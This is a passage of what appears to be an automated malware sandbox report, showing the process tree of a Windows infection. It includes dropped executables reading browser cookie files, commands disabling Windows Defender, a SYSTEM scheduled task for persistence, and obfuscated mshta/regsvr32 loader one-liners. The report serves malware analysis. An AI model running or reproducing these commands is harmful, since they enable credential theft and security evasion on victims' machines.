                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:5028
                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:3256
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                PID:1536
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                8⤵
                                                                                  PID:5996
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  8⤵
                                                                                    PID:5384
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:4720
                                                                                • C:\Users\Admin\Documents\gWyfuyWlTuRjfNzjY1_wgrcZ.exe
                                                                                  "C:\Users\Admin\Documents\gWyfuyWlTuRjfNzjY1_wgrcZ.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4976
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-MN2H7.tmp\gWyfuyWlTuRjfNzjY1_wgrcZ.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-MN2H7.tmp\gWyfuyWlTuRjfNzjY1_wgrcZ.tmp" /SL5="$301A6,138429,56832,C:\Users\Admin\Documents\gWyfuyWlTuRjfNzjY1_wgrcZ.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:1936
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-575TF.tmp\Setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-575TF.tmp\Setup.exe" /Verysilent
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Drops file in Program Files directory
                                                                                      PID:4324
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"
                                                                                        9⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5124
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5132
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5840
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          10⤵
                                                                                            PID:3844
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5340
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5144
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a
                                                                                            10⤵
                                                                                              PID:5840
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"
                                                                                            9⤵
                                                                                              PID:5164
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit
                                                                                                10⤵
                                                                                                  PID:6128
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im GameBox64bit.exe /f
                                                                                                    11⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5660
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    11⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5580
                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe
                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"
                                                                                                9⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5200
                                                                                                • C:\Users\Admin\AppData\Roaming\7232009.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\7232009.exe"
                                                                                                  10⤵
                                                                                                    PID:5764
                                                                                                  • C:\Users\Admin\AppData\Roaming\1212198.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1212198.exe"
                                                                                                    10⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:5800
                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                      11⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3700
                                                                                                  • C:\Users\Admin\AppData\Roaming\6507952.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\6507952.exe"
                                                                                                    10⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:5568
                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                  9⤵
                                                                                                    PID:5240
                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe
                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\GameBox8876.exe" /Silent
                                                                                                    9⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:5288
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4008
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_3.exe
                                                                                            sonia_3.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Modifies system certificate store
                                                                                            PID:4168
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1636
                                                                                              6⤵
                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                              • Program crash
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2424
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3424
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_6.exe
                                                                                            sonia_6.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:592
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              6⤵
                                                                                                PID:1596
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4260
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                6⤵
                                                                                                  PID:4472
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  6⤵
                                                                                                    PID:6140
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                4⤵
                                                                                                  PID:3972
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                  4⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:4112
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC8361504\sonia_2.exe
                                                                                                    sonia_2.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:4172
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 408
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:652
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                            1⤵
                                                                                            • Modifies registry class
                                                                                            PID:2608
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2400
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                              1⤵
                                                                                                PID:2380
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                1⤵
                                                                                                  PID:1924
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                  1⤵
                                                                                                    PID:1448
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                    1⤵
                                                                                                      PID:1340
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                      1⤵
                                                                                                        PID:1180
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                        1⤵
                                                                                                          PID:1128
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:512
                                                                                                          • C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                            C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                            2⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:316
                                                                                                          • \??\c:\windows\system\svchost.exe
                                                                                                            c:\windows\system\svchost.exe
                                                                                                            2⤵
                                                                                                              PID:5916
                                                                                                            • C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                              C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                              2⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:2392
                                                                                                            • C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                              C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5624
                                                                                                              • C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                3⤵
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4292
                                                                                                            • C:\Users\Admin\AppData\Roaming\evguvwh
                                                                                                              C:\Users\Admin\AppData\Roaming\evguvwh
                                                                                                              2⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:3480
                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\KGCToQuEL\KGCToQuEL.dll",KGCToQuEL
                                                                                                              2⤵
                                                                                                              • Windows security modification
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:2260
                                                                                                            • \??\c:\windows\system\svchost.exe
                                                                                                              c:\windows\system\svchost.exe
                                                                                                              2⤵
                                                                                                                PID:5396
                                                                                                              • C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                                C:\Users\Admin\AppData\Roaming\egguvwh
                                                                                                                2⤵
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5804
                                                                                                              • C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:5288
                                                                                                                • C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                  C:\Users\Admin\AppData\Roaming\biguvwh
                                                                                                                  3⤵
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:1216
                                                                                                              • C:\Users\Admin\AppData\Roaming\evguvwh
                                                                                                                C:\Users\Admin\AppData\Roaming\evguvwh
                                                                                                                2⤵
                                                                                                                • Checks SCSI registry key(s)
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4852
                                                                                                              • \??\c:\windows\system\svchost.exe
                                                                                                                c:\windows\system\svchost.exe
                                                                                                                2⤵
                                                                                                                  PID:3572
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                1⤵
                                                                                                                  PID:356
                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4532
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                    2⤵
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Modifies registry class
                                                                                                                    PID:2656
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                    2⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                    • Modifies registry class
                                                                                                                    PID:2188
                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1876
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1740
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:5324
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                    2⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Modifies registry class
                                                                                                                    PID:5344
                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:6036
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                    2⤵
                                                                                                                      PID:6056
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                    PID:5216
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\2B5D.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\2B5D.exe
                                                                                                                    1⤵
                                                                                                                      PID:6028
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4C35.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4C35.exe
                                                                                                                      1⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:3928
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5BB7.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5BB7.exe
                                                                                                                      1⤵
                                                                                                                        PID:5596
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\B7F1.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\B7F1.exe
                                                                                                                        1⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                        PID:5960
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DE95.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DE95.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:5164
                                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          PID:6028
                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                          schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                          2⤵
                                                                                                                          • Creates scheduled task(s)
                                                                                                                          PID:4908
                                                                                                                        • C:\Windows\System\svchost.exe
                                                                                                                          "C:\Windows\System\svchost.exe" formal
                                                                                                                          2⤵
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:5028
                                                                                                                          • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                            3⤵
                                                                                                                              PID:6092
                                                                                                                            • C:\Windows\System\spoolsv.exe
                                                                                                                              "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:5764
                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                          1⤵
                                                                                                                            PID:2668
                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                            C:\Windows\explorer.exe
                                                                                                                            1⤵
                                                                                                                              PID:1544
                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                              1⤵
                                                                                                                                PID:5708
                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                1⤵
                                                                                                                                  PID:4304
                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5852
                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:5736
                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:5924
                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5704
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:5976
                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                            1⤵
                                                                                                                                              PID:1236
                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                              1⤵
                                                                                                                                                PID:5136
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\67AB.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\67AB.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2200
                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\67AB.exe"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF """" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\67AB.exe"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5368
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\67AB.exe" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "" == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\67AB.exe" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4992
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE
                                                                                                                                                            ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5884
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF ""/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ "" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4596
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ " == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" ) do taskkill /IM "%~nxu" -F
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:6124
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScriPt: CLosE ( CReATEoBJECT ( "WScRiPT.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = ""MZ"" > c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A + EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q * " , 0 , tRUE ) )
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4200
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = "MZ" >c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A +EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q *
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:2732
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>c2Y3YxsZ.M9Z"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5928
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:5324
                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                regsvr32 ..\BkZz.p /u -S
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:3400
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /IM "67AB.exe" -F
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:4964
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6981.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\6981.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      PID:220
